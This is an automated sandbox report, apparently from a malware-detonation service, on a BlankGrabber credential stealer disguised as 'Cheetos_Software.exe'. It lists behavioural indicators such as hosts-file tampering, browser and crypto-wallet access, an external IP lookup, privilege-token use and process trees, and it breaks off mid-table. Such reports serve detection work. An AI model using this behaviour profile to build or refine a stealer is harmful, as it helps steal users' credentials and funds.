Malware Analysis Report

2024-11-13 13:58

Sample ID 240407-ywk6nsdb9s
Target Cheetos_Software.exe
SHA256 d8b6347bd3c847455f6befbe29d412cfe44054fe9893d81a3adc32c64d9e2251
Tags
blankgrabber spyware stealer upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d8b6347bd3c847455f6befbe29d412cfe44054fe9893d81a3adc32c64d9e2251

Threat Level: Known bad

The file Cheetos_Software.exe was found to be: Known bad.

Malicious Activity Summary

blankgrabber spyware stealer upx

A stealer written in Python and packaged with Pyinstaller

Blankgrabber family

Drops file in Drivers directory

Executes dropped EXE

Reads user/profile data of web browsers

UPX packed file

Loads dropped DLL

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Enumerates physical storage devices

Detects videocard installed

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Gathers system information

Enumerates processes with tasklist

Suspicious use of FindShellTrayWindow

Checks SCSI registry key(s)

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: GetForegroundWindowSpam

Views/modifies file attributes

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-07 20:08

Signatures

A stealer written in Python and packaged with Pyinstaller

Description Indicator Process Target
N/A N/A N/A N/A

Blankgrabber family

blankgrabber

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-07 20:08

Reported

2024-04-07 20:11

Platform

win10v2004-20240226-en

Max time kernel

149s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe"

Signatures

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\_MEI34842\rar.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3484 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe
PID 3484 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe
PID 2000 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 2000 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 2000 wrote to memory of 3476 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 2000 wrote to memory of 3476 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 2000 wrote to memory of 3136 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 2000 wrote to memory of 3136 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 2000 wrote to memory of 4248 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 2000 wrote to memory of 4248 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 4248 wrote to memory of 4856 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4248 wrote to memory of 4856 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2000 wrote to memory of 4136 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 2000 wrote to memory of 4136 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 2000 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 2000 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 2760 wrote to memory of 956 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2760 wrote to memory of 956 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2000 wrote to memory of 720 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\tree.com
PID 2000 wrote to memory of 720 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\tree.com
PID 3136 wrote to memory of 2080 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 3136 wrote to memory of 2080 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 2000 wrote to memory of 4928 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 2000 wrote to memory of 4928 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 2000 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 2000 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 2528 wrote to memory of 3640 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2528 wrote to memory of 3640 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2000 wrote to memory of 3292 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 2000 wrote to memory of 3292 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 2000 wrote to memory of 5116 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 2000 wrote to memory of 5116 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 2000 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 2000 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 4136 wrote to memory of 3300 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4136 wrote to memory of 3300 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2000 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 2000 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3476 wrote to memory of 3748 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3476 wrote to memory of 3748 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2288 wrote to memory of 4088 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2288 wrote to memory of 4088 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 720 wrote to memory of 1292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 720 wrote to memory of 1292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 3292 wrote to memory of 3212 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 3292 wrote to memory of 3212 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 2572 wrote to memory of 4260 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2572 wrote to memory of 4260 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4928 wrote to memory of 3404 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4928 wrote to memory of 3404 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5116 wrote to memory of 5064 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\DllHost.exe
PID 5116 wrote to memory of 5064 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\DllHost.exe
PID 1488 wrote to memory of 5100 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1488 wrote to memory of 5100 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2000 wrote to memory of 3508 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
